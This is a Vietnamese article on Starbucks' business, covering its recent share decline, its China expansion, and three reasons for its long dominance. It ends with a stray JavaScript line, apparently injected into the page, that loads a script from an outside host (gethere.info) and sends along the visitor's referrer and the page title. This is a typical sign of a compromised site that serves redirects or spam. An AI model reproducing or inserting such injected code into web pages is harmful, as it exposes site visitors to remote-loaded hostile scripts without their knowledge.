Chuyện gì sẽ xảy ra nếu cuộc sống trong thế kỷ 21 của chúng ta thiếu đi những cốc cà phê tiếp thêm nguồn sinh lực? Là một người yêu cà phê, giả thiết này thực sự đáng sợ với tôi. Không khó để tìm thấy một quán cà phê khi bạn đi bộ 5 phút trong thành phố và Starbucks chính là một trong những thương hiệu cà phê tiên phong biến những chiếc ly nhựa “take-away” thành một phụ kiện thời trang lý tưởng.
Hiện nay, những ly cà phê dường như đi xa hơn so với giới hạn của một loại đồ uống thông thường.
Và tất nhiên, “đương kim vô địch” trong ngành công nghiệp cà phê cũng luôn dẫn đầu trong bất cứ cuộc cạnh tranh nào. Làm thế nào để họ có được điều đó? Thị trường cà phê đang bão hòa với rất nhiều thương hiệu mới, Starbucks bị ảnh hưởng như thế nào? Câu trả lời sẽ được tìm hiểu trong bài viết này.
Với sự trỗi dậy của hàng loạt thương hiệu cà phê mới tại Mỹ và trên thế giới, cổ phiếu của Starbucks đã giảm 11% so với tháng 7 năm ngoái. Lợi nhuận quý 2 năm nay sụt giảm. Starbucks bắt đầu có những động thái cực đoan. Trong năm qua xu hướng của Starbucks là tăng trưởng liên tục dù gặp phải một số cuộc suy thoái không đáng kể, tuy nhiên đây có lẽ là một trong những rào cản lớn nhất.
Theo Forbes Markets Reporter Agustino Fontevecchia, Starbucks đã quá lạc quan khi quyết định mở rộng thị phần tại thị trường Trung Quốc, tuy nhiên, điều này lại khiến nhiều cổ đông lo ngại. Giá trị kỳ vọng của cổ phiếu giảm, tốc độ tăng trưởng giảm trong khi Giám đốc điều hành Howard Shultz vẫn luôn tin rằng Starbucks là một đế chế cà phê hùng mạnh để có thể vượt qua mọi “sóng gió” trên thị trường.
Cùng nhìn lại 3 lý do chính khiến thương hiệu này đã thống trị ngành cà phê thế giới hơn 40 năm qua:
#1 Một địa điểm cho tất cả mọi người
Nhiều người sẽ phải đồng ý rằng Starbucks phục vụ loại cà phê chất lượng giúp họ có được quyền lực ngay trong những ngày đầu tiên. Nhưng cà phê chỉ nằm trong tùy chọn thực đơn duy nhất, những cửa hàng mới thực sự làm cho thương hiệu này trở nên phổ biến hơn.
Là một trong những thương hiệu hiếm hoi hướng đến đối tượng khách hàng là những bạn trẻ hay dân văn phòng có điều kiện nhưng lại luôn dành một lượng chỗ ngồi nhất định trong các cửa hàng cho trẻ em và người già.
Họ muốn truyền tải một thông điệp rằng những cốc cà phê có thể phù hợp với người trẻ tuổi nhưng không có nghĩa là họ từ chối phục vụ trẻ em hay người già, bởi lẽ, ở đây, có rất nhiều loại bánh ngọt cũng một số đồ ăn kèm dễ tiêu hóa.
#2 Trở nên thông dụng
Với mức giá khoảng $2.00 cho một tách cà phê nhỏ và lên tới $20,00 cho một loại đồ uống “sang chảnh”. Mức giá mà Starbucks đưa ra bao quát khá rộng đối tượng khách hàng cũng như vẫn có khả năng cạnh tranh lớn đối với đối thủ cạnh tranh.
Ngoài sự đa dạng của các loại đồ uống không phải là cà phê, những khách hàng khi bước chân qua cánh cửa kính với dòng chữ nhỏ màu xanh treo trên cao ở bên ngoài tòa nhà, họ muộn ngồi trong một khôn gian sang trọng cùng các chuyên gia pha chế trong tạp dề màu xanh lá cây. Tất cả mọi thứ đều gợi nhắc về thương hiệu này chứ không cần phải nhìn thấy chữ “Starbucks” hiện hữu trên những cốc cà phê.
#3 Luôn tiện lợi
Có lẽ độ tin cậy của Starbucks là chìa khóa để chiến thắng trong vị giác và lòng trung thành của khách hàng. Chuyên gia pha chế làm việc một cách nhanh chóng và ổn định. Starbucks đã thậm chí hợp tác với Square từ mùa thu năm 2012 để tối ưu hóa cách thức đặt hàng tại nhà.
Mọi người thường phàn nàn về giá của Starbucks khá cao, nhưng là $2,00 cho một ly cà phê chất lượng, wifi miễn phí, có chỗ ngồi làm việc, gặp mặt bạn bè thì cái giá đó cũng xem như là chấp nhận được. Khi cuộc sống hiện đại của chúng ta dường như liên tục tăng tốc độ, mô hình kinh doanh của Starbucks trở nên phù hợp hơn. Starbucks có hàng tá đối thủ cạnh tranh, cũ và mới – những người cũng tự hào vì mang cà phê có thương hiệu với sự nhanh nhẹn đến tay khách hàng.
Một vài đối thủ cạnh tranh đáng chú ý bao gồm Dunkin Donuts, Tim Hortons, Peet Coffee và The Coffee Bean & Tea Leaf (chuỗi cà phê bán lẻ tư nhân lớn nhất nước Mỹ). Bởi vì Starbucks vẫn duy trì vị trí của nó như là chuỗi cà phê lớn nhất thế giới, với gần 17.000 cửa hàng và đếm trong hơn 50 quốc gia, nên sự thất vọng trong những thị trường nhỏ lẻ gần đây không phải là vấn đề qua to tát với thương hiệu này.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;